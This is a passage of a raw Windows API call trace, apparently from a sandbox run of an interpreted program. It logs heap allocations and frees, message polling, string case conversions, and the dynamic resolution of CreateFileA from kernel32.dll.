lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.619] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.619] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.619] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.619] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af608 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.620] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.622] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.625] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c868 [0042.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c868, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.625] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0042.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.626] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.626] RtlAllocateHeap (HeapHandle=0x770000, 